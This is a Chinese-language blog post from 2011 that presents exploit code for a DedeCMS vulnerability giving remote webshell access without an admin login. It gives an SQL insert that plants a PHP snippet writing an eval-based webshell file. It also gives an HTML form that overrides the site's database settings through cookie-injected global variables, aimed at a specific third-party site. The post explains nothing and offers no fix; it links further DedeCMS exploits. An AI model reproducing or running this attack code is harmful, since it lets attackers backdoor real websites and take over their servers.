首页 > Web安全 > dedecms最新getshell漏洞利用代码
2011
09-10

dedecms最新getshell漏洞利用代码

DedeCms是目前网络上比较流行的一款PHP整站程序,中文名为“织梦内容管理系统”。最近,DedeCms出现了一个严重的漏洞,黑客通过漏洞可以得到网站的webshell.最为恐怖的是可以直接向服务器写入Webshell,而不必通过登录网站后台。到底漏洞是如何形成的,黑客是如何达到目的的,让我们来一探究竟吧。
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell
前题条件,必须准备好自己的dede数据库,然后插入数据:

  1. insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen(“1.php”, \’a\’);@fwrite($fp, \'<?php eval($_POST[c]) ?>\’);echo “OK”;@fclose($fp);{/dede:php}’);   


再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。

    1. <form action=”” method=”post” name=”QuickSearch” id=”QuickSearch” onsubmit=”addaction();”>
    1. <input type=”text” value=”http://www.jjddoudizhubisai.com/mytag_js.php?aid=1″ name=”doaction” style=”width:400″><br />
    1. <input type=”text” value=”dbhost” name=”_COOKIE[GLOBALS][cfg_dbhost]” style=”width:400″><br />
    1. <input type=”text” value=”dbuser” name=”_COOKIE[GLOBALS][cfg_dbuser]” style=”width:400″><br />
    1. <input type=”text” value=”dbpwd” name=”_COOKIE[GLOBALS][cfg_dbpwd]” style=”width:400″><br />
    1. <input type=”text” value=”dbname” name=”_COOKIE[GLOBALS][cfg_dbname]” style=”width:400″><br />
    1. <input type=”text” value=”dede_” name=”_COOKIE[GLOBALS][cfg_dbprefix]” style=”width:400″><br />
    1. <input type=”text” value=”true” name=”nocache” style=”width:400″>
    1. <input type=”submit” value=”提交” name=”QuickSearchBtn”><br />
    1. </form>
    1. <script>
    1. function addaction()
    1. {
    1. document.QuickSearch.action=document.QuickSearch.doaction.value;
    1. }
    1. </script>

 

相关文章,附上最新的dedecms两个严重漏洞:

Dedecms plus/search.php注入漏洞

http://www.nxadmin.com/web/1043.html

影响版本:v57

Dedecms修改任意管理帐号密码+getshell漏洞

http://www.nxadmin.com/blog/archives/dedecms-getshell-sqli.html

影响版本:v57 和 v57 sq1

getshell利用成功率较低

最后编辑:
作者:admin
这个作者貌似有点懒,什么都没有留下。

留下一个回复

你的email不会被公开。